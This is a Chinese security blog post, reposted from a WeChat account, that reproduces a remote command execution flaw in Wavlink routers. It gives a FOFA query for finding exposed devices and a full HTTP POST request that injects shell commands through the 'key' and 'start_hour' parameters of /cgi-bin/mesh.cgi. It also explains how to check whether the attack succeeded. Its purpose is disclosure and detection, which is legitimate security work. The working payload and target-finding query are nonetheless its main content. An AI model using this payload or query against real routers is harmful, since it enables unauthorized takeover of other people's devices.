Wavlink路由器远程命令执行漏洞

admin

102737
文章

87
评论

2024年1月9日10:30:13评论44 views字数 740阅读2分28秒阅读模式

一、漏洞描述

睿因科技Wavlink路由器存在远程命令执行漏洞，通过此漏洞攻击者可执行任意命令，如写入木马文件，远程控制路由器。

Wavlink路由器远程命令执行漏洞

二、网络空间搜索引擎搜索

fofa查询

icon_hash="-1350437236"

Wavlink路由器远程命令执行漏洞

从搜索情况来看，此产品主要分布在国外

三、漏洞复现

如：执行id命令，并将执行结果写入到路由器中

POST /cgi-bin/mesh.cgi?page=upgrade&key=%27;id%3E%3Echeck.txt' HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 30

page=night_led&start_hour=;id;

Wavlink路由器远程命令执行漏洞

执行成功后，访问路径 /cgi-bin/check.txt 如果文件存在则漏洞存在

Wavlink路由器远程命令执行漏洞

四、漏洞检测

nuclei漏洞检测

Wavlink路由器远程命令执行漏洞

漏洞检测脚本已上传免费漏洞库

地址：

https://github.com/Vme18000yuan/FreePOC

原文始发于微信公众号（网络安全透视镜）：Wavlink路由器远程命令执行漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

Wavlink路由器远程命令执行漏洞

CVE-2024-23722

CVE-2024-0783

CNVD-2024-06148

CVE-2024-4040｜CrushFTP 认证绕过模板注入漏洞（POC）

【漏洞复现】ZenTao（禅道）身份认证绕过漏洞（QVD-2024-15263）

（CVE-2024-25648）福昕阅读器 ComboBox 小部件格式事件 UAF

漏洞复现 || SpringBlade dict-biz/list接口SQL注入

漏洞预警 | 大华智慧园区综合管理平台远程代码执行漏洞

漏洞预警 | JeecgBoot任意文件上传漏洞

漏洞预警 | 若依druid未授权访问漏洞

发表评论

在线咨询

微信